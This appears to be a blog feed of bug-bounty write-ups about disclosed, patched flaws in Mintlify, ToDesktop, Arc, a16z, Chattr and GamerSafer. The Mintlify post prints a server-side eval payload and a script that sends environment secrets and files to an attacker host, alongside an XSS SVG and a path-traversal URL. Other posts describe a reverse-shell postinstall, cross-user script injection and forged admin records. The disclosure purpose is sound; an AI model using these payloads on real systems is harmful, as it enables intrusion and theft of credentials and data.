![\"\"](\"https://eva.ac/files/img/posts/mintlify/next-env.png\")
this blogpost was a collaboration with two people, their articles are here: hackermon and mdl
\nthis started when i was notified that discord switched documentation platforms to mintlify, a company i briefly looked into before, and i thought it would be a good idea to take another look now that theyre bigger.
\nmintlify is a b2b saas documentation platform that allows companies to make documentation via MDX files and they host it for them, and add styling, etc.
\nsome of their customers would include:
\n...and more, you can view a full list here
\ntheres also a bunch of ai features and stuff, but thats beyond the point
\nso, i signed up and got to digging.
\nmintlify uses MDX to render docs their customers provide, and i was wondering how they render it on the server-side for static page generation (because a docs site needs that for search engines/bots).
\nthis is because mdx is basically jsx (think react) combined with markdown, meaning you can add js expressions to your markdown. so whats preventing us from making a jsx expression that evaluates code on the server?
\nwell, i tried it with a simple payload to just eval things from a webserver
\n{!!fetch("https://attacker.eva.ac").then((r) => r.text()).then((c) => eval(c))}\ni deployed it to mintlify and went to the page it was on, and i got a request from a vercel/amazon ip! are they really doing this on their nextjs app?
\ni wrote a simple script to exfilitrate some data such as the process.env (and app files) to find out:
\nconst exfil = (data) =>\n fetch("https://attacker.eva.ac", {\n method: "POST",\n body: JSON.stringify(data),\n });\nexfil({ files: [{ name: ".env.json", content: JSON.stringify(process.env) }] });\ntry {\n import("fs").then(async (a) => {\n const arr = [];\n for (const filename of a.readdirSync(".", { recursive: true })) {\n if (a.lstatSync(filename).isDirectory()) continue;\n const content = a.readFileSync(filename, "utf-8");\n arr.push({ name: filename, content });\n }\n console.log(arr.length);\n await exfil({ files: arr });\n console.log("done exfiling");\n });\n} catch (error) {\n exfil(error);\n}\nand, after running it, this is what i got:
\n
shit. this is bad, we have full access.
\ni quickly realised that this was the server-side serverless (lol) environment of their main documentation app, while this calls to a external api to do everything, we have the token it calls it with in the env.
\nalongside, we can poison the nextjs cache for everyone for any site, allowing mass xss, defacing, etc on any docs site.
\nwe can also pretend nonexistent pages exist in the cache, allowing targeted xss too
\nwith the other keys we could also:
\nso:
\nvery bad.
\nafter getting all of the server routes, i noticed a interesting one: /_mintlify/static/[subdomain]/{...path}. this route seemed to allow you to get static images from your repository, such as svgs, pngs, etc.
what if i could access my organizations asset from another domain?
\nwell i tried, i crafted a url that looked like
\nhttps://discord.com/_mintlify/static/evascoolcompany/xss.svg\nwhich, the svg on my repository having this content:
\n<svg xmlns="http://www.w3.org/2000/svg" onload="alert(window.origin);"/>\nand when i went to the url, i got this:
\n![\"\"](\"https://eva.ac/files/img/posts/mintlify/discord-alert.png\")
well, fuck.
\nthis allows complete 1 click xss on users who click a link. definitely not great, but it makes the fact worse that most companies dont properly scope cookies, or have their documentation on a subpath (such as /path).
the latter was true in discords case, their documentation was on /developers/docs, and i can just get the token value from localstorage directly, and exfiltrate it using whatever i want
some other companies that i could do full exploitation on are twitter, vercel and cursor. though we did not check many companies and there is definitely more
\na few hours after i started looking into this, i got an unexpected, sort of out of nowhere message from a friend, hackermon, who had found the targeted xss independently aswell
\n![\"\"](\"https://eva.ac/files/img/posts/mintlify/hackermon-message.png\")
we started looking into this together, alongside mdl, who was also looking into it with hackermon
\nalso checkout their blogposts here and here! (respectively)
\nwe also got in contact with mintlify, and started disclosing everything we already had and future things directly to them
\nafter mintlify patched the targeted xss via static, i was looking at the code for the route and had an idea
\nthe code for the endpoint looked like this (not exact, recreation):
\nexport async function GET(_, { params }) {\n const { subdomain, path: pathParts } = await params;\n const path = "/" + pathParts.join("/");\n\n const url = `${CDN_BASE_URL}/${subdomain}${path}`;\n const res = await fetch(url);\n\n if (!res.ok)\n return new NextResponse("Asset not found", {\n status: 404,\n });\n\n return res; // inaccurate, does more operations but we simply dont care about them here\n}\nand i realised, nothing prevents us from adding url encoded path traversal in a part of a path, to climb up the cdn path
\nso i crafted a url and tested, it looked like
\nhttps://discord.com/_mintlify/static/discord/images/create-team-owned-app.png%2F..%2F..%2F..%2Fevascoolcompany%2Fxss.svg\nand i was met with the beautiful alert page again
\n
always remember to encode your paths properly!
\nalongside this, i found a few non-critical vulnerabilties which don't deserve an entire section, so here they are:
\nadd it to your repository, wait for the deployment to build and access it on any mintlify-provided documentation/custom domain with the path /_mintlify/static/evascoolcompany/xss.svg or similar with prefixes
all together, i think this series of vulnerabilities had very big impact. considering we could supply chain attack various big fortune 500 companies, including but not limited to:
\n...and more, you can view a full list here
\nwe could on targeted companies:
\nafter we got in contact with mintlify, everything was patched very swiftly. and i was awarded 5,000 USD for my efforts and findings.
\nthe patches for the vulnerabilties were:
\nmake sure to check out hackermon and mdl's reports for more details on other vulnerabilties, and the possible exploitation that couldve happened.
\n![\"\"](\"https://eva.ac/files/img/posts/mintlify/cve-card.png\")
card by marshift
\n","date_published":"Thu, 18 Dec 2025 00:00:00 GMT"},{"id":"https://eva.ac/blog/todesktop/","url":"https://eva.ac/blog/todesktop/","title":"how to gain code execution on millions of people and hundreds of popular apps","content_html":"this started when i was looking into cursor, an ai text editor. also, i use lulu by objective-see on my laptop, so when i downloaded the cursor installer, i got this pop-up:
\n![\"A](\"https://eva.ac/files/img/posts/todesktop/lulu-alert.png\")
now, what the hell is todesktop? i thought i was downloading cursor? well, looking at their website, they seem to be an electron app bundler service alongside providing a SDK for electron apps. so it appears the installer i downloaded is actually managed by todesktop, not cursor.
\nthis made me curious and i made an account on todesktop to look into it, and when i clicked the github login button, i saw my calling: firebase
\nrealising the app used firestore (firebase's no-sql database that is often used in frontend), i quickly opened my devtools and began doing basic recon on the firebase.
\ni realised that the site has sourcemaps, which made searching for all of the firestore paths used in the app even easier (its still easy without sourcemaps, usually)
\nthen i found an insecure collection, temporaryApplications, which seemed to give me an name list of some applications (edit: todesktop has clarified this collection has no sensitive data and hasnt been updated since 2022), but not much other than that, everything seemed secure on the firebase other then this.
i then noticed that most of the deployment and general logic happens in the terminal, with the npm package @todesktop/cli, so i installed that and started looking into it
the cli manages deployments, source code uploads, and much more. the website just seems to be a shell to create applications, view deployments, etc etc
\ni was once again lucky that the cli also had sourcemaps, so i used sourcemapper to extract them into a source tree.
\nlooking in there, i found an arbitrary s3 upload vulnerability via a firebase cloud function called getSignedURL, but i didn't really have an s3 key (file path) to upload to that would do something interesting, so i kept looking.
i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload
this worked. navigating around the container, i figured out where the actual code-building application lives, and found this:
\n![\"A](\"https://eva.ac/files/img/posts/todesktop/config-encrypted.png\")
oh fuck, this usually means something bad. i found the code for decrypting this file, and this is what i got after decrypting it myself:
\n![\"A](\"https://eva.ac/files/img/posts/todesktop/config-json.png\")
fuck. this container stores secrets
\nlooking around in the container more, i found a hardcoded firebase admin key (which was full-scoped).
\ni quickly realized that with the credentials i have, i could deploy an auto update to any app of my liking, having clients receive it immediately when they restart the app.
\ni then made some code to use my credentials to deploy an update to my app, and it worked. i immediately got a update on my client and got RCE.
\nwith this, i could push auto updates to all applications using todesktop, such as:
\n(please do not harass these companies or make it seem like it's their fault, it's not. it's todesktop's fault if anything)
\nwhich, if i were to estimate, is probably in the range of hundreds of millions of people in tech environments, other hackers, programmers, executives, etc. making this exploit deadly if used.
\ni immediately used my contacts to get in reach with the owner of todesktop, we were chatting via signal and the fix came almost immediately. they were nice enough to compensate me for my efforts and were very nice in general.
\nthe build container now has a privileged sidecar that does all of the signing, uploading and everything else instead of the main container with user code having that logic.
\nsecurity incidents happen all the time, its natural. what matters is the company's response, and todesktop's response has been awesome, they were very nice to work with.
\ncheck out todesktop's incident report here
\nfor those wondering, in total i got 5k for this vuln, which i dont blame todesktop for because theyre a really small company
\nupdate: cursor (one of the affected customers) is giving me 50k USD for my efforts.
\n","date_published":"Fri, 28 Feb 2025 00:00:00 GMT"},{"id":"https://eva.ac/blog/arc/","url":"https://eva.ac/blog/arc/","title":"gaining access to anyones browser without them even visiting a website","content_html":"we start at the homepage of arc. where i first landed when i first heard of it. i snatched a download and started analysing, the first thing i realised was that arc requires an account to use, why do they require an account?
\nso i boot up my mitmproxy instance and i sign up, and i see that they are using firebase for authentication, but no other requests, are they really just using firebase only for authentication?
\nafter poking around for a bit, i discovered that there was a arc featured called easels, easels are a whiteboard like interface, and you can share them with people, and they can view them on the web. when i clicked the share button however, there was no requests in my mitmproxy instance, so whats happening here?
\nfrom previous experience hacking an IOS based app, i immediately had a hunch on what this was, firestore.
\nfirestore is a database-as-a-backend service that allows for developers to not care about writing a backend, and instead write database security rules and make users directly access the database.
\nthis has of course sparked a lot of services having insecure or insufficient security rules and since researching that, i would like to call myself a firestore expert.
\nfirestore has a tendency to not abide by the system proxy settings in the Swift SDK for firebase, so going off my hunch, i wrote a frida script to dump the relevant calls.
\nvar documentWithPath =\n ObjC.classes.FIRCollectionReference["- documentWithPath:"];\nvar queryWhereFieldIsEqualTo =\n ObjC.classes.FIRQuery["- queryWhereField:isEqualTo:"];\nvar collectionWithPath = ObjC.classes.FIRFirestore["- collectionWithPath:"];\n\nfunction getFullPath(obj) {\n if (obj.path && typeof obj.path === "function") {\n return obj.path().toString();\n }\n return obj.toString();\n}\n\nvar queryStack = [];\n\nfunction logQuery(query) {\n var queryString = `firebase.${query.type}("${query.path}")`;\n query.whereClauses.forEach((clause) => {\n queryString += `.where("${clause.fieldName}", "==", "${clause.value}")`;\n });\n console.log(queryString);\n}\n\nInterceptor.attach(documentWithPath.implementation, {\n onEnter: function (args) {\n var parent = ObjC.Object(args[0]);\n var docPath = ObjC.Object(args[2]).toString();\n var fullPath = getFullPath(parent) + "/" + docPath;\n var query = { type: "doc", path: fullPath, whereClauses: [] };\n queryStack.push(query);\n logQuery(query);\n },\n});\n\nInterceptor.attach(collectionWithPath.implementation, {\n onEnter: function (args) {\n var collectionPath = ObjC.Object(args[2]).toString();\n var query = { type: "collection", path: collectionPath, whereClauses: [] };\n queryStack.push(query);\n },\n});\n\nInterceptor.attach(queryWhereFieldIsEqualTo.implementation, {\n onEnter: function (args) {\n var fieldName = ObjC.Object(args[2]).toString();\n var value = ObjC.Object(args[3]).toString();\n\n if (queryStack.length > 0) {\n var currentQuery = queryStack[queryStack.length - 1];\n currentQuery.whereClauses.push({ fieldName: fieldName, value: value });\n }\n },\n onLeave: function (retval) {},\n});\n\nvar executionMethods = [\n "- getDocuments",\n "- addSnapshotListener:",\n "- getDocument",\n "- addDocumentSnapshotListener:",\n "- getDocumentsWithCompletion:",\n "- getDocumentWithCompletion:",\n];\n\nexecutionMethods.forEach(function (methodName) {\n if (ObjC.classes.FIRQuery[methodName]) {\n Interceptor.attach(ObjC.classes.FIRQuery[methodName].implementation, {\n onEnter: function (args) {\n if (queryStack.length > 0) {\n var query = queryStack.pop();\n logQuery(query);\n }\n },\n });\n }\n});\n\nfunction formatFirestoreData(data) {\n if (data.isKindOfClass_(ObjC.classes.NSDictionary)) {\n let result = {};\n data.enumerateKeysAndObjectsUsingBlock_(\n ObjC.implement(function (key, value) {\n result[key.toString()] = value.toString();\n })\n );\n return JSON.stringify(result);\n }\n return data.toString();\n}\n\nvar documentMethods = [\n { name: "- updateData:completion:", type: "update" },\n { name: "- updateData:", type: "update" },\n { name: "- setData:completion:", type: "set" },\n { name: "- setData:", type: "set" },\n];\n\ndocumentMethods.forEach(function (method) {\n if (ObjC.classes.FIRDocumentReference[method.name]) {\n Interceptor.attach(\n ObjC.classes.FIRDocumentReference[method.name].implementation,\n {\n onEnter: function (args) {\n var docRef = ObjC.Object(args[0]);\n var data = ObjC.Object(args[2]);\n var fullPath = getFullPath(docRef);\n var formattedData = formatFirestoreData(data);\n console.log(\n `firebase.doc("${fullPath}").${method.type}(${formattedData})`\n );\n },\n }\n );\n } else {\n console.log("Warning: " + method.name + " not found");\n }\n});\nhacky script, but it works. so i launched arc with the script loaded on startup and this is what i got:
\nfirebase.doc("preferences/UvMIUnuxJ2h0E47fmZPpHLisHn12");\nfirebase.doc(\n "preferences/UvMIUnuxJ2h0E47fmZPpHLisHn12/stringValues/autoArchiveTimeThreshold"\n);\nfirebase.doc("preferences/UvMIUnuxJ2h0E47fmZPpHLisHn12");\nfirebase.doc(\n "preferences/UvMIUnuxJ2h0E47fmZPpHLisHn12/stringValues/autoArchiveLittleArcTimeThreshold"\n);\nfirebase.doc("preferences/UvMIUnuxJ2h0E47fmZPpHLisHn12");\nfirebase.doc(\n "preferences/UvMIUnuxJ2h0E47fmZPpHLisHn12/stringValues/autoArchiveTimeThresholdsPerProfile"\n);\nfirebase.doc("users/UvMIUnuxJ2h0E47fmZPpHLisHn12");\nfirebase\n .collection("user_referrals")\n .where("inviter_id", "==", "UvMIUnuxJ2h0E47fmZPpHLisHn12");\nfirebase\n .collection("boosts")\n .where("creatorID", "==", "UvMIUnuxJ2h0E47fmZPpHLisHn12");\nsick. so it looks like arc stores some preferences in firestore, along with a basic user object, referrals and boosts
\narc boosts are a way for users to customize websites, by blocking elements, changing fonts, colors, and even using their own custom css and js.
\ndo you see where this is going?, so, i manually logged into my account using my dummy page to test firebase accounts, and executed the exact same query to get my boosts:
\n![\"\"](\"https://eva.ac/files/img/posts/arc/firebase-query-1.png\")
cool, let me create a simple boost on google.com
\n![\"\"](\"https://eva.ac/files/img/posts/arc/firebase-query-2.png\")
hey! theres our boost, lets try changing some parameters around.
\ni see that it queries by creatorID, and we cant query a different creator ID than the original, but what if we update our own boost to have another users id?
well, i tried it with another account of mine, and this way the result when i went to google.com on the other computer (the victim one)
\n![\"\"](\"https://eva.ac/files/img/posts/arc/alert-popup.png\")
what the fuck? it works?
\ncreatorID fieldcreatorID field to any user idthus, if we were to find a way to easily get someone elses user id, we would have a full attack chain
\nwhen someone referrs you to arc, or you referr someone to arc, you automatically get their user id in the user_referrals table, which means you could just ask someone for their arc invite code and they'd likely give it
you can share arc boosts (only if they don't have js in them) with other people, and arc has a public site with boosts, and boostSnapshots (published boosts) contain the user id of the creator.
\narc has a feature called easels, which are basically whiteboards, you can share easels, and this also allows you to get someones user id.
\nthis would be the final attack chain:
\ncreatorID field to the targetsthe browser company normally does not do bug bounties (update: see at the end of post), but for this catastrophic of a vuln, they decided to award me with $2,000 USD
the timeline for the vulnerability:
\nwhile poking around, i saw that boosts actually execute for other protocols aswell (even though you cant create them in the client), so someone could create a boost targeting the page settings, and it would execute on chrome://settings, which allows further escalation of priviliges.
while researching, i saw some data being sent over to the server, like this query everytime you visit a site:
\nfirebase\n .collection("boosts")\n .where("creatorID", "==", "UvMIUnuxJ2h0E47fmZPpHLisHn12")\n .where("hostPattern", "==", "www.google.com");\nthe hostPattern being the site you visit, this is against arc's privacy policy which clearly states arc does not know which sites you visit.
in light of these vulnerabilities and to introduce new features arc is switching off of firebase. additionally, arc has published their own write-up addressing these issues
\na tldr version would be:
\nadditionally, from internal discussions with arc they are also:
\ni like to do this thing where i search twitter, looking for companies, and then try giving them a quick pentest. i've done a lot of my hacks this way and its more effective than you think it is.
\non this search, i use the "Relevant People" tab more often than you think, this is how i got to a16z
\nwhile looking into a16z, i did a usual subdomain scan and used tooling from lunchcat which does common checks on domains, scanning for secrets in js files, etc.
\nin this search, i came across portfolio.a16z.com, a site that seems like a portfolio management tool for companies that are in a16z. while doing cursory checks like i usually do, lunchcat seemed to catch a AWS key referenced somewhere in the website.
i confirmed this and what i saw in the js, was this.
\n{\n MARKETPLACE_URL: "<REDACTED>",\n DATABASE_URL: "<REDACTED>",\n SALESFORCE_CLIENT_ID: "<REDACTED>",\n SALESFORCE_SECURITY_TOKEN: "<REDACTED>",\n npm_config_user_agent: "<REDACTED>",\n SALESFORCE_CLIENT_SECRET: "<REDACTED>",\n SALESFORCE_USERNAME: "<REDACTED>",\n OKTA_CLIENT_ID: "<REDACTED>",\n OKTA_CLIENT_SECRET: "<REDACTED>",\n SESSION_SECRET: "<REDACTED>",\n API_USERNAME: "<REDACTED>",\n GOOGLE_CLIENT_ID_DEVELOPMENT: "<REDACTED>",\n CLIENT_TOKEN_SECRET: "<REDACTED>",\n GOOGLE_CLIENT_SECRET_DEVELOPMENT: "<REDACTED>",\n AWS_BUCKET_NAME: "<REDACTED>",\n npm_config_prefix: "<REDACTED>",\n REACT_APP_SENTRY_DSN: "<REDACTED>",\n AWS_BUCKET_TEAM_PAGES: "<REDACTED>",\n MAILGUN_API_KEY: "<REDACTED>",\n GOOGLE_CLIENT_ID: "<REDACTED>",\n AWS_LOGO_BUCKET_URL: "<REDACTED>",\n SALESFORCE_KEY: "<REDACTED>",\n GOOGLE_CLIENT_SECRET: "<REDACTED>",\n PAPERTRAIL_API_TOKEN: "<REDACTED>",\n MAILGUN_PASSWORD: "<REDACTED>",\n OKTA_CALLBACK_URL: "<REDACTED>",\n SALESFORCE_PASSWORD: "<REDACTED>",\n MAILGUN_USER: "<REDACTED>",\n AWS_ACCESS_KEY_ID: "<REDACTED>",\n PNPM_CONFIG_CACHE: "<REDACTED>",\n AWS_SECRET_ACCESS_KEY: "<REDACTED>",\n MAILGUN_DOMAIN: "<REDACTED>",\n GOOGLE_CALLBACK_URL_DEVELOPMENT: "<REDACTED>",\n API_PASSWORD: "<REDACTED>",\n SENTRY_DSN: "<REDACTED>",\n SALESFORCE_LOGIN_URL: "<REDACTED>",\n COOKIE_SECRET: "<REDACTED>",\n OKTA_DOMAIN: "<REDACTED>",\n NODE_MODULES_CACHE: "<REDACTED>",\n GOOGLE_CALLBACK_URL: "<REDACTED>",,\n NODE_ENV: "<REDACTED>",\n HEROKU_POSTGRESQL_CRIMSON_URL: "<REDACTED>",\n TALENTPLACE_URL: "<REDACTED>",\n}\nthis was. horrifying, it was the entire process.env of a heroku instance, in the JS. put in dynamically.
i did a quick valid look of the credentials and they didnt seem like fake credentials. they. were. real. and all someone had to do find them was go to the sources tab of inspect element.
\nthe compromised list of services:
\na16z did not give me any bug bounty on this because of the fact i publicly reached out instead of trying to reach out privately. the only reason i did it this way was because:
\nengineering@a16z.com bounced my emailsso, i dunno. imo this is unfair.
\ntechcrunch article (lorenzo reached out to me seeing my tweet trying to get in contact with them and wrote a piece!): https://techcrunch.com/2024/07/18/researcher-finds-flaw-in-a16z-website-that-exposed-some-company-data/
\n","date_published":"Sat, 20 Jul 2024 00:00:00 GMT"},{"id":"https://eva.ac/blog/microsoft-pwnage/","url":"https://eva.ac/blog/microsoft-pwnage/","title":"how to pwn microsoft","content_html":"This article has moved, please click here
","date_published":"Wed, 10 Jan 2024 00:00:00 GMT"},{"id":"https://eva.ac/blog/chattr/","url":"https://eva.ac/blog/chattr/","title":"how we owned almost all of america's fast food chains","content_html":"check out mrbruhs blogpost if you havent already
\nso recently i was on call with some friends messing with some other stuff when we remembered the existence of a scanner we made for firebase and found https://chattr.ai and realised they used firebase, we didnt know much about firebase at the time so we simply tried to find a tool to see if it was vulnerable to something obvious and we found firepwn, which seemed nice for a GUI tool, so we simply entered the details of chattr's firebase.
\nat first, we got permission denied for everything, so we thought it was safe. but then we tried registering a account with firebase manually, and once we signed in, we could see literally everything.
\nwe were in a call at the time, and our reaction to this was insane, as if we look at chattr's website, they manage hiring for a lot of fast food chains.
\n![\"Carousel](\"https://eva.ac/files/img/posts/chattr/companies.png\")
at this point, we had quite a lot of access but we wanted to see how bad this could get. so we kept searching, and after looking at the admin dashboard javascript for a while we found these firestore collections:
\n{orgID}/candidateJobs{orgID}/conversations{orgID}/groups{orgID}/jobs{orgID}/locations{orgID}/notifications{orgID}/usersthese leaked quite a lot but what we were most interested in was getting access to the admin dashboard or getting a admin account, we quickly found out all of the admin accounts are in the organization of 0 which seems to be the chattr organization. if we look at one of these users we'll see this:
{\n "createdDt": REDACTED,\n "id": "REDACTED",\n "phone": "",\n "shouldRefresh": false,\n "jobTitle": "",\n "forceLogout": false,\n "locations": [],\n "combinedLocations": [],\n "scheduleOptions": [],\n "lastLoginDt": REDACTED,\n "modifiedDt": REDACTED,\n "status": "active",\n "isDeleted": false,\n "email": "REDACTED@chattr.ai",\n "createdBy": {\n "id": "REDACTED",\n "email": "REDACTED@chattr.ai"\n },\n "providerId": "REDACTED",\n "ghostOrg": "0",\n "modifiedBySource": "api-middleware-user-activity",\n "roles": [\n "SuperAdmin"\n ],\n "groups": [],\n "modifiedBy": null,\n "orgId": "0",\n "lastActivity": REDACTED,\n "firstname": "REDACTED",\n "lastname": "REDACTED",\n "timezone": "America/New_York"\n }\n\nso out of pure curiosity i tried to create a document with a random id and replaced the provider id with our fake user id copying this document, and out of nowhere it worked:
\n![\"Photo](\"https://eva.ac/files/img/posts/chattr/admin-overview.png\")
and the impact here is obvious:
\n![\"Photo](\"https://eva.ac/files/img/posts/chattr/admin-superadmins.png\")
... and more:
\n![\"Photo](\"https://eva.ac/files/img/posts/chattr/admin-orgs.png\")
... and even more:
\n![\"Photo](\"https://eva.ac/files/img/posts/chattr/admin-candidate-apply-convo.png\")
we soon realised from this admin dashboard, we could view conversations of candidates, phone numbers, profile pictures and more very powerful stuff from this admin panel, but while looking around on their app i randomly went to their actual user interface where i discovered something very interesting.
\nthere was a "ghost" mode where superadmins could access someone elses account and fully control them, this was where i discovered the fact that we could view billing info with this:
\n![\"Photo](\"https://eva.ac/files/img/posts/chattr/ghost-stripe.png\")
we could also hire people and do other stuff with the ghost mode.
\nso, that was one hell of a ride but the basic TLDR is that
\nbig hiring company got fully pwned by a really stupid vulnerability that couldve been prevented really easily, the following data was exposed:
\nwe did not save any info other then the screenshots above and maybe a few more, we did make sure to get rid of extremely sensetive personal information.
\n","date_published":"Wed, 10 Jan 2024 00:00:00 GMT"},{"id":"https://eva.ac/blog/workers-rs/","url":"https://eva.ac/blog/workers-rs/","title":"how to use workers-rs (prime edition)","content_html":"so, recently prime has been making doom in ascii and wants to make a web frontend for it, but because its over tcp, he cant.
the most scalable way of doing this is through cloudflare workers, and because cloudflare workers uses JS, prime doesnt want to use it.
luckily, cloudflare has a way of creating workers with rust, which prime loves for some reason. this article explains how to make a simple project with workers-rs and get started on a ws <-> tcp proxy
this is thankfully very simple, you just have to cargo generate cloudflare/workers-rs, this will give you some base code to work with.
this part isnt as easy because there is barely any documentation on how to do it, but there is some test code found in the repo to do it with.
this is the part that i assumed was going to be really bad with rust WASM bindings, but its suprisingly simple, there is still no documentation but there is some example code which just gives it all here
so, it was basically as simple as combining those 2 examples together, i've made a github repository to show how i did this, and stress tested it with 10,000 clients, it works pretty well!
","date_published":"Wed, 10 Jan 2024 00:00:00 GMT"},{"id":"https://eva.ac/blog/gamersafer/","url":"https://eva.ac/blog/gamersafer/","title":"why client-side environment variables are a bad idea","content_html":"at the time of writing this is all patched, dont come to me asking if it still works and how you can do it.
\nso, recently i was looking into a microsoft partner called gamersafer which promotes facial recognition KYC to log into games (fun stuff) and also notably runs the official minecraft serverlist which is riddled with servers that are against mojangs own rules
\nim in some cringy "minecraft server owner" or "minecraft influencer" discord server where people like to shit on mojang (for no real reason) on, and i saw this message chain on one:
\n![\"im](\"https://eva.ac/files/img/posts/gamersafer/initial.png\")
this reminded me of the fact that gamersafer exists and that they are a microsoft partner, which got me to poke around their service!
\nso, as i do i was just looking at their subdomains to see if theres anything interesting on them, and one stuck out: admin.gamersafer.com.
opening the domain in a browser displayed a login prompt that looked a little like this:
\n![\"a](\"https://eva.ac/files/img/posts/gamersafer/admin-panel.png\")
upon opening firefox devtools, i discovered that this page actually had JS sourcemaps on, which was going to be useful for reversing stuff.
\nthe first thing i do is to try to look for api calls, and as i did so, something stuck out with the api client, it seemed to be referencing something called REACT_APP_AWS_ACCESS_KEY and REACT_APP_AWS_SECRET_KEY while i dont know about aws that much, this looked a little funky.
it was supposed to be in the process.env but obviously we arent in node so that doesnt exist so i decided to just search for it in the non-sourcemapped js:
\n![\"the](\"https://eva.ac/files/img/posts/gamersafer/creds.png\")
so, i cleaned this up and took a better look at it:
\n{\n\t"NODE_ENV": "production",\n\t"PUBLIC_URL": "",\n\t"WDS_SOCKET_HOST": null,\n\t"WDS_SOCKET_PATH": null,\n\t"WDS_SOCKET_PORT": null,\n\t"FAST_REFRESH": true,\n\t"REACT_APP_API_HOST": "apiv2.gamersafer.com",\n\t"REACT_APP_AWS_SECRET_KEY": "redacted+redacted",\n\t"REACT_APP_CHECKOUT_API_URL": "https://redacted.execute-api.us-east-1.amazonaws.com/prod/",\n\t"REACT_APP_AWS_ACCESS_KEY": "redacted",\n\t"REACT_APP_AUTH_SECRET_KEY": "redacted"\n}\nat first i thought that the AWS secret key being exposed was fine because it had very limited permissions, so to confirm that i quickly looked at the AWS rest api to see how it worked, the module that seemed the simplest and juiciest to me was IAM, and long story short, the account/key we had access to, had full administrator access:
\n<Path>/</Path>\n<AttachedManagedPolicies>\n <member>\n <PolicyArn>arn:aws:iam::aws:policy/AmazonAPIGatewayAdministrator</PolicyArn>\n <PolicyName>AmazonAPIGatewayAdministrator</PolicyName>\n </member>\n <member>\n <PolicyArn>arn:aws:iam::aws:policy/service-role/AmazonAPIGatewayPushToCloudWatchLogs</PolicyArn>\n <PolicyName>AmazonAPIGatewayPushToCloudWatchLogs</PolicyName>\n </member>\n <member>\n <PolicyArn>arn:aws:iam::aws:policy/AdministratorAccess</PolicyArn>\n <PolicyName>AdministratorAccess</PolicyName>\n </member>\n <member>\n <PolicyArn>arn:aws:iam::aws:policy/AmazonSESFullAccess</PolicyArn>\n <PolicyName>AmazonSESFullAccess</PolicyName>\n </member>\n <member>\n <PolicyArn>arn:aws:iam::aws:policy/AmazonSQSFullAccess</PolicyArn>\n <PolicyName>AmazonSQSFullAccess</PolicyName>\n </member>\n <member>\n <PolicyArn>arn:aws:iam::aws:policy/AmazonAPIGatewayInvokeFullAccess</PolicyArn>\n <PolicyName>AmazonAPIGatewayInvokeFullAccess</PolicyName>\n </member>\n <member>\n <PolicyArn>arn:aws:iam::aws:policy/AmazonS3FullAccess</PolicyArn>\n <PolicyName>AmazonS3FullAccess</PolicyName>\n </member>\n <member>\n <PolicyArn>arn:aws:iam::aws:policy/AWSLambda_FullAccess</PolicyArn>\n <PolicyName>AWSLambda_FullAccess</PolicyName>\n </member>\n <member>\n <PolicyArn>arn:aws:iam::aws:policy/service-role/AmazonS3ObjectLambdaExecutionRolePolicy</PolicyArn>\n <PolicyName>AmazonS3ObjectLambdaExecutionRolePolicy</PolicyName>\n </member>\n</AttachedManagedPolicies>\n<GroupList />\n<UserName>redacted</UserName>\n<Arn>arn:aws:iam::redacted:user/redacted</Arn>\n<UserId>redacted</UserId>\n<CreateDate>redatced</CreateDate>\n<Tags />\nwhich means that if i wanted to, i could do anything like exfiltrate all their data and delete everything.
\nso first i tried the gamersafer.com contact form, which didnt seem like it did anything.
\nthen i tried to get some contacts in gamersafer with the help of some friends. i was eventually able to get in contact with TheMisterEpic, which had previously talked to gamersafer before and he quickly created a groupchat with the product manager, who quickly responded to my inquiry.
\nfrom there, it was just taking down stuff and revoking the keys.
\nthey said thanks but there was no bounty given (kinda expected)
\ndont use client environment variables for secrets, please.
\nthis mistake couldve been avoided by delegating more things to serverside api calls from authorized clients.
\nit has been 72 hours since disclosure of this vulnerability to gamersafer, they have not disclosed the breach of all of their infrastructure to end users which (i believe) is highly illegal in the GDPR.
\ni also found another vulnerability in findmcserver which allowed me to approve my own server, give myself badges and approving my own server.
\n![\"find](\"https://eva.ac/files/img/posts/gamersafer/server.png\")
while this isnt as critical, they found the server and i started getting spam logged out (lol), i soon recieved a DM from the CEO.
\ni also got this email from the ceo saying they disclosed it (havent checked and it was literally past the disclosure time anyway, better then nothing)\n![\"Dear](\"https://eva.ac/files/img/posts/gamersafer/lol.png\")